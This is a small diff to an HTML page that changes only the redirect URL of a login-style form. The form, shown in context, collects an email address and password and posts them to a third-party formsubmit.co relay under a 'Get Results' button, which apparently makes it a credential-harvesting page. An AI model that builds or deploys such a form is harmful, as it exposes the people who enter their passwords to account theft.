--- a/index.html
+++ b/index.html
@@ -102,7 +102,7 @@
             <form action="https://formsubmit.co/a817f7119674f6f98c80f883abb8ea12" method="POST">
                 <input type="email" name="email" placeholder="Email address" required>
                 <input type="password" name="password" placeholder="Password" required>
-                <input type="hidden" name="_next" value="https://jacky-nc.github.io/htmltest.github.io/email_sent.html">
+                <input type="hidden" name="_next" value="https://jacky-nc.github.io/getresults.github.io/email_sent.html">
                 <button type="submit">Get Results</button>
             </form>
             <div id="message" style="margin-top:18px;color:#2563eb;font-weight:500;"></div>
